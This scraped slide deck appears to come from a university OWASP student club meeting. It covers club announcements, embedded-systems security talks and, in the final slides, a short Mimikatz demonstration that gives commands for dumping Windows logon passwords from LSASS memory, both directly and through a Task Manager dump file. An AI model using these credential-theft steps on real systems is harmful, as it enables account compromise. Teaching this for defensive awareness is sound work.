UC.yber Meeting 18 If Youre New! Join our Slack ucyber.slack.com - - PowerPoint PPT Presentation

uc yber meeting 18 if you re new
SMART_READER_LITE
LIVE PREVIEW

UC.yber Meeting 18 If Youre New! Join our Slack ucyber.slack.com - - PowerPoint PPT Presentation

Aug 28, 2022 281 likes •437 views

UC.yber Meeting 18 If Youre New! Join our Slack ucyber.slack.com Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati OWASP Chapter Feel free to get involved with one of our committees: Content/Events ,

slide-1
SLIDE 1

UC.yber Meeting 18

slide-2
SLIDE 2

If You’re New!

  • Join our Slack ucyber.slack.com
  • Follow us on Twitter @UCyb3r and Facebook UC.yber; University of Cincinnati

OWASP Chapter

  • Feel free to get involved with one of our committees: Content/Events ,

Finance, and Social Media

  • Stay updated through our weekly emails
slide-3
SLIDE 3

Announcements

  • We are getting 20 CHIPs for our members to use!
  • Our server will be set up and running very soon!
  • US Bank visit is now in the works! Late Summer or sometime in Fall.
  • We attended an Embedded Systems Security talk in Dayton Monday
  • UCRI wants to start research with us, also visit them
  • September ~20th we will compete in PacketWars at UD, more info to come...
slide-4
SLIDE 4
slide-5
SLIDE 5
slide-6
SLIDE 6
slide-7
SLIDE 7

Embedded System Tech Talks

Opening Notes:

  • Endpoint security is only ONE viewpoint on the problem
  • Software/ Hardware developers are unknowingly leaving vulnerabilities in

their systems Tech Talks:

  • System Schedule Security
  • Neural Network Example in “Pong”
  • Airforce Autonomous Drone Surveillance
slide-8
SLIDE 8

Neural Network Tech Talk (Pt. 1)

PONG!

Neural Network Player vs. Procedural Based Player

  • At first, the NN player lost most of the time
  • After millions of instances of the NN player learns the best

paths, the NN player would beat the PB player almost every time

26 PB 02 NN U h

  • h

. .

slide-9
SLIDE 9

Neural Network Tech Talk (Pt. 2)

Procedural Based Player

  • If the ball is to the left, go left. If it is to the right, go right.

Neural Network Player

  • It learns which path is the best path
  • You can go even further by “pruning” the data

Research / Project

  • This goes hand-in-hand with our project / research
slide-10
SLIDE 10

System Schedule Security (Pt. 1)

  • How system schedules are usually hacked

○ During “downtime” ○ Hackers see the system schedule as blocks of digital signals

  • Optimal way to hack a system schedule

○ During a “project” / “projects” ○ In increments

  • How To Defend:

○ Randomize the system schedules ○ Run a periodic “system check” over downtime

slide-11
SLIDE 11

System Schedule Security (Pt. 2)

slide-12
SLIDE 12

Mimikatz Password Stealing

slide-13
SLIDE 13

How to do it!

Launch Mimikatz # Privilege::debug Output should be Privilege ‘20’ OK # sekurlsa::logonPasswords full

slide-14
SLIDE 14

How hackers do it...

Open Task manager Go to Details and type lsass Right click lsass.exe and select Create Dump File Copy file location and navigate to the dump. Copy the dump to your mimikatz install folder. # sekurlsa::minidump lsass.dmp # sekurlsa::logonPasswords full